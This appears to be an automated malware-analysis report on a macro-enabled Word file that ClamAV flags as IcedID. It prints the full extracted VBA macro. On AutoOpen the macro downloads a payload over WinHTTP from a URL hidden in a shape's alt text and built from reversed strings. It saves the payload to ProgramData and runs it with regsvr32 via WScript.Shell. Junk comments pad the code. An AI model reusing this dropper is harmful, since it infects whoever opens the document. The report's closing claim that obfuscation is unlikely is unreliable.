MALICIOUS
Risk Score: 290
Heuristics: 7
- ClamAV: Doc.Macro.ICEID1020-9781212-0 (critical, CLAMAV_DETECTION). ClamAV detected this file as malware: Doc.Macro.ICEID1020-9781212-0
- VBA project inside OOXML (medium, OOXML_VBA, 4 related findings). Document contains a VBA project — VBA macros present
- Potential Shell call in VBA (critical, OLE_VBA_SHELL). Matched line in script: Set aGgOJ = CreateObject(IGYBU + "." + "shell")
- CreateObject call (high, OLE_VBA_CREATEOBJ). Matched line in script: Set Fdqqb = VBA.CreateObject(eYuXT + "" + lfZSM)
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC). Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
- AutoOpen macro (low, OLE_VBA_AUTOOPEN). Matched line in script: Sub AutoOpen()
- Embedded URL (info, EMBEDDED_URL). One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
Extracted artifacts (2)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 13932 bytes |

SHA-256: 8686e30c96a91cca5a6d71eb5dbd95aaf63cc1fccde5ef76e73b84650d966d4b
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "lcISL"
Sub VsyHu(RzHaK, Optional ByVal tlirJ As String = "c:\programdata\rOjqf.txt", Optional ByVal lfZSM As String = "systemobject")
' Contemptible aria
' Jockeys gallium oversupply
' Spaniel plopping
' Shifting vulgar
' Abstainer deserving
' Inlay covert
' Enrage turmoil wagers
' Wellchosen nicer sojourner
' Person extremists
' Reroutes aforementioned religiously relevantly
' Trivialisations homogenisation
' Darlings misogynistic spoon
' Unprotected algorithmically jump disallowing
' Cosmos upbraids shielded
' Etymological oppression warn
' Passwords annoyance exempt
' Gravitated freedom converse
' Presidencies trudged financing sexists
' Ledge unmonitored acquiesced shuttles furthering
' Hill subjectivity
' Academy miami patters feminism lanyard
' Natives aerobatics transactor deportee copulatory
' Prosperously worriedly hopefully
' Backpedalled rejected desiring
' Leafing tracheostomy librated
' Aegina revoke occurrence outsmart
Set Fdqqb = VBA.CreateObject(eYuXT + "" + lfZSM)
' Novelist emitted receiver
' Colloquium disadvantages mauler announcing
' Pundits ravaged overdoing ruinous basal producer mortals
' Bisect reader attics
' Misrepresents peahens
Set EdMnF = Fdqqb.CreateTextFile(tlirJ)
' Subsurface filth dubiously
' Bobbins palming defaults
' Mystified riffs striking true affably
' Botulism polarisation pleasures equatorial
' Republication recently phlegmatically
' Perturbed bates
' Kwachas okays
' Approves tyrannically streetwalkers peacefully
EdMnF.WriteLine RzHaK
' Applicator exponents invasion markups
' Scuba dried gun swindles declination lamenter
' Housebuilder juggler
' Redoubtable triathlon predicting terminate phonological
' Shamefaced revels artier prettiest peeps floozie guardedly
' Updates zooming trollish baiters moonlighting
EdMnF.Close
' Revises fabrication transpires obeying
' Inscribed
' Polony higgledypiggledy
' Longlasting
' Alder pettishly tsetse
' Micrograph chancel covets
' Androids buttressed glide
' Ruffs leavers dementedly
' Mulches circumvents unpersuaded rerouted
' Technophobia smidgeon
' Poked manifest encircled imploded swindled trilling
' Miscellany inaudibility fidelity interest
' Whalers
' Tactlessness relativity canvassed
' Sycophantically obey unanimously
' Eritrea seminaries psychiatrist vulnerabilities
' Trod reverses shies receivable unambiguous extractable prologue
' Terrifies
' Oversleep sands delay motley
' Unmerited oppresses surtitles absconder
' Dissension squirt listlessly
' Foregrounding sullenly
' Factual misled
' Protozoa darn regrouped fatter roosts
' Indemnity mammals
' Unhonoured schemas jihad wayside
' Reseller shakiest welldesigned faith
' Irk arboreal exultantly inexactitudes
' Cleanliness keeps emancipating nave moonshots
' Tweedy ambushed
' Modelled manic unbelievability tank
' Headless
' Spanner quenches sunflower replicas
' Saluting sieved tipoffs
' Factious overcommitments
' Ostensibly precluding promiscuity charmless victors predicative inconceivably
' Stakes logarithmically
' Psalmody psychotherapy disinclination
End Sub
' Obscured auburn incests roar
' Telegrams iniquity argot thirstier lapland his
' Lazaret dumping outgrow compiled romantic
' Admiral computerliterate stress locomotive regale
' Uncanny friskiest substance
Sub AutoOpen()
' Bitch
' Contexts causality pandas sheerness
' Cabal nipper
' Cybernetic seep backer crosschecks floggers
' Oversight
' Wobbliest soiling tricking
' Fulsome anthropogenically decoratively
' Uncured anaemic
' Deregulation carbines heathens
' Reinforced october tether
' Palisades will thoughtprovoking reach
' Pulsar peru appeasers alluvia
' Aerodynamics malefactor peer maturer
' Catcher unbalances
' Graves inflowing haggled
' Fun embargoed
' Moreover whip cysts
' Ventrally rolls oracle
' Soloists minuses prefaces predisposing billions tied outflow
' Plaids weekdays hangglider
' Atrociously untended
' Tiniest pageant dentition
' Armenia simultaneous rhythms tennis smudgier stepsister
' Technologies optimisation
' Anchor normalised
' Rotational bicycles ergodic
' Ability editors
Dim AGGfb As New gUwvT
' Weird thriftless
' Backups assailant dynamite
' Strengthen tsunami provocation circumferences shore
' Badgering salesperson
zqgQB = ""
' Taxable coons
' Conceptually basilica philatelists alternates
' Rib sails
' Reconstruction scientific refundable laymen obeyed
' Heartbreaking rye sightly neverending impending viaduct approximating
' Waterresistant coasted fortnights goaded
' Algebraic
' Elongates drearily
' Observances cuds dusty anecdotes exterior bunions
' Deathless sultan undisplayed harmlessness surround
' Rupees yore
RzHaK = AGGfb.alWvs(DHAdD)
' Bandiest picturesqueness fourthly noiselessly
' Reassessments slewed fecundity mastered
' Disquietude commitments mums squeamishness
' Generously
' Indicator
VsyHu WSYSj(RzHaK)
' Greened victimises apparitions
' Centimetres forwarded mutates tabbed
' Wavelengths scope
' Mate pipes fly caravanning
' Deem stereo
' Outplay shamefully
' Nohow worthily codicil
' Functional jest succinct soothsayers
' Catapults allotment
' Contiguously singeing tic unjammed hapless
' Mope juddered
WTZvL ayZJP(0) + "vr32 c:\programdata\rOjqf.txt", "wscript"
End Sub
Function Xxlue(fkzGl, aBkjX)
' Playmates dutchman
' Enjoyed kneedeep twirl
' Role measureless earliest linearity schoolboy
' Polyglots southwards patriotic stenographer brilliantly
' Televising corvettes pasteboard placates
Xxlue = Split(fkzGl, aBkjX)
End Function
Attribute VB_Name = "rwHET"
' Integrated unifiable secretariats callous
' Shampooing dielectric underfund ingenuous shelves
' Sigma fibbed deepfrozen
' Abscissa come frustrate landfall blatantly
' Recollects
' Similitude superglue
' Thematically revived conjectured hangup continuously
Function WSYSj(xCFJX)
' Superscript popper portability numbed
' Truncheons probabilistic
' Compassion monocular canoeing stylistically
' Multicoloured confers novices misfiled
' Stimulant
WSYSj = StrConv(xCFJX, vbUnicode)
' Satellite loser pause
' Appendicitis surgeons
' Germanic
' Unsaid cuddliness reasonable
' Hibernating latecomer creationist foundry
' Gatecrash posturing presuppositions
End Function
' Midevening sauerkraut javelin amount refuses
' Limp cascades rubble joiners cigar
' Multiracial
' Stodgy preserved punted consummated enters
' Slickness inquiringly meal
' Juggling debar categorises flowered
' Closable nominative clandestinely jesters wrappings
Function bwBEd()
' Refusals pelvic
' Escorting fornicator
' Ballot psychokinetic defrost
' Warning enunciating impede wellbuilt leeches
' Uhuh complains chewier selfpity
' Ruminatively palisades aired primogeniture afferent helicopter
' Risk brainwashed menacingly muffling doggerel
' Repatriate interjected bruises malted capsizes
' Typographers weekenders wellpreserved
' Radiographers craters
' Stirrups currency pushups sodomise
With ActiveDocument.shapes(1)
bwBEd = .AlternativeText
End With
End Function
' Glycol
' Caged
' Marketeers unsmilingly exclamatory
' Kingfisher cabby
' Namibia poundage lobbied inveiglers stiletto beers
' Vessel
Function ayZJP(NDqvx)
' Jumbled superhero handier
' Corralled ammonites
' Rovings unclear crocodiles netts
' Intercontinental variety jews sickening
' Subarctic topless lawabiding exuberant
' Moaner diphthongs trilled kilowatts inks
' Rooibos fund
' Banquets requited unmutilated heads
iWtIj = Xxlue(bwBEd(), "~~~")
iXAbx = iWtIj(NDqvx)
ayZJP = iXAbx
End Function
Attribute VB_Name = "gUwvT"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Function XDGwo(kYIBR, qLDEV, LAXBf)
' Hinted lefthanded stuffiest goons code stoning sprouted
' Illconceived pave reuses reproaching
' Foulness dieting topped fratricidal
' Lacteal assertive
' Flexible marry android
' Archly dovecot brotherinlaw
XDGwo = Mid(kYIBR, qLDEV, LAXBf)
End Function
Public Function WpYes(fBjnv, spKWg)
' Subsumed clues cooperated bishoprics unfettered repositions
' Robbing reading
' Planetary
' Absence operetta escalators rubbles disaffection
' Safer unleashed mockers
' Transcendent taxpayers
' Pointblank epiphenomena nulls pricey
' Companion soothers compositional
' Seedier ominously
' Expend frogmen doctrines baiting
' Unpaired soberly swishy brisk ethic
' Scale lymphomas defiant rewrote
' Races jumping protegees greenhouse
' Neutraliser liquefied scuffling
' Distributed screechier predation
' Choppier keyboard versed westernmost taverns
' Desideratum
' Whitecollar panoramic reassess
' Predation
NTOrJ = Trim(fBjnv)
For EmYKd = spKWg To Len(NTOrJ)
MKYnQ = XDGwo(NTOrJ, EmYKd, spKWg) & MKYnQ
Next EmYKd
WpYes = MKYnQ
End Function
' Dockland personifications seclusion gradualist
' Freelance
' Amazons vaccinated voices disruption
' Grown hellfire effusion belong
Function alWvs(vyqet)
' Miscalculation squeezing leaden
' Nutmeg placemen
' Unorganised pollutants epigones
' Unadulterated disposers assimilating slushiest heirloom
' Disuse shammed leathery zealotry
' Hollowness
Dim XBsXz As Object
' Rebelliously blackmailer disrepute popper
' Reaction tapers mucous biogeographical
' Creative
' Badged
' Conferences redeemable
' Incoherence strutting
' Tinware hoping brasses gunfire psalmist expunging cupboard
' Mechanisms
' Withering dwindling incompetence flits humbled
' Prejudge dreadnought monumental outlining
' Swipe interpolates roses irregularities
' Dutchman anthologised iceland impregnation declassified
' Mac creepy cutter slightest formal
Set XBsXz = CreateObject(WpYes(vyqet, 1) + "." + WpYes(vyqet, 1) + "Request.5.1")
' Wordier tetanus chaos curricle papers
' Volcanic hypodermic
' Gulping optimisations everliving withstanding rejuvenations
' Dearest porpoise stewards
' Prickliest strangles
' Oddly ganger shortening journalist involute
' Semiconductors
' Dipsticks suspension outbuilding
' Annuals steer augite bowlers
' Monarchic spay
' Jimmy convicts battles waists
' Cress screechiest encroaches amplifier
' Scheme
' Resent bylaw paddle foretell proselytise
' Spuriously cursory amulets contractually
' Flabby quirks transporter overshadow
' Portrays food reassured actuator receiver
' Stutters taxonomist palatial
' Cumbersome rainfall invoiced
' Terseness insults
' Acolytes proletarians spanners
' Diploma entwined
' Foregrounding opioid rivets
' Recycle clampdown vortices
' Absolve adopted retort
KLaKb = ayZJP(1)
' Enslaves net identically
' Monopole striding
' Scrooge seniority surety incompressible brandishes
' Superiors indulgently
' Ceremoniously nagged
' Sowers poison mercifully dakoits
' Preside unrestrained dictatorships
XBsXz.Open "GET", WpYes(KLaKb, 1), False
' Sexton astral compassed
' Functionless vivisectionists
' Slacken gracefulness glueing
' Noisy
' Choke stapled epic microscope husbandman
' Unwarrantable inadvertently manifests
' Homage decked rewards
XBsXz.Send
' Adept disturbed
' Artisan pigtailed absolutists acidophiles
' Cooling hydrostatics lexicographic goth
' Paratroops posit valuation voltmeter
' Marshmallows traps
alWvs = XBsXz.responsebody
End Function
Attribute VB_Name = "FuESu"
Public Const DHAdD As String = "ptthniw"
Public Const eYuXT As String = "scripting.file"
Sub WTZvL(abSpW, IGYBU)
' Downgrades lolled hulls
' Operational northwards
' Floaty girlish sittings evaporator patrilineal
' Skerries delve warder
' Introduced forebrain glyphs mantissas explosive occidental
Set aGgOJ = CreateObject(IGYBU + "." + "shell")
' Unergonomic strikes teeniest slats long vellum
' Calculates contrition system
' Draperies workday predecessors murmurings
' Coven seceding giggly openers smirked
' Depleted amphibia proposes
' Ceramist guessable damply centimetres
' Hotblooded courteously with leagues entries
' Gravity impotent
' Troll consistently inmates
' Saturated unmaintainable pensioner sealed
' Explosions mollified trenches ultra lavender
' Tunnelling bunched malformations impersonal
' Prompted clampdown selfconsciousness
' Evokes shagged psycholinguists democrat arabians niceties
' Redefinitions unfit parabolic
' Tepee bogs
' Advantageously fiefs repetitive lumpy bawdier
' Cogitative lien synthesisers
' View enthalpy
' Overshot discomforts boiling
' Vouchsafed cranks baseless
' Paragons
' Blunted townspeople ghostlier frictional contraction
' Invading thickens memphis
' Inclement mummify meddle ulster
' Interferometry privilege
' Acutest cataloguer ballades pry tumescent brunts quebec
' Student pursues kiddie drudges
' Silty smoggy beheld inadvisable impeded
' Escapees cannonballs muslim departs
' Alms storming shack intaglio
' Empowerment gunsmiths soused
' Cubic amazon lamb coated
' Linger frizzles
' Applications mastectomy interceptions
' Headlights malingerers
' Classier perambulated
' Unstirred
' Inequalities animator chopped example
' Caramel
' Volubly
' Astutely prospecting rightmost
' Advertiser flanks panic arbitrary
' Revolutionising
Call aGgOJ.exec(abSpW)
' Twinned liniment inn toga dispenser forward
' Beatings solidity ordeals
' Stray trappable defectives antidepressants
' Loch sackfuls
' Revamps omission performable fingermarks embroiling
End Sub
| Filename | Kind | Source | Size |
|---|---|---|---|
| vbaProject_00.bin | vba-project | OOXML VBA project: word/vbaProject.bin | 49664 bytes |

SHA-256: 20793eff2de9fc35a830c5df0efed9297314ab40cddbfcfd108cd0562d0b39ec

Detection:
ClamAV: Doc.Macro.ICEID1020-9781212-0
Obfuscation or payload: unlikely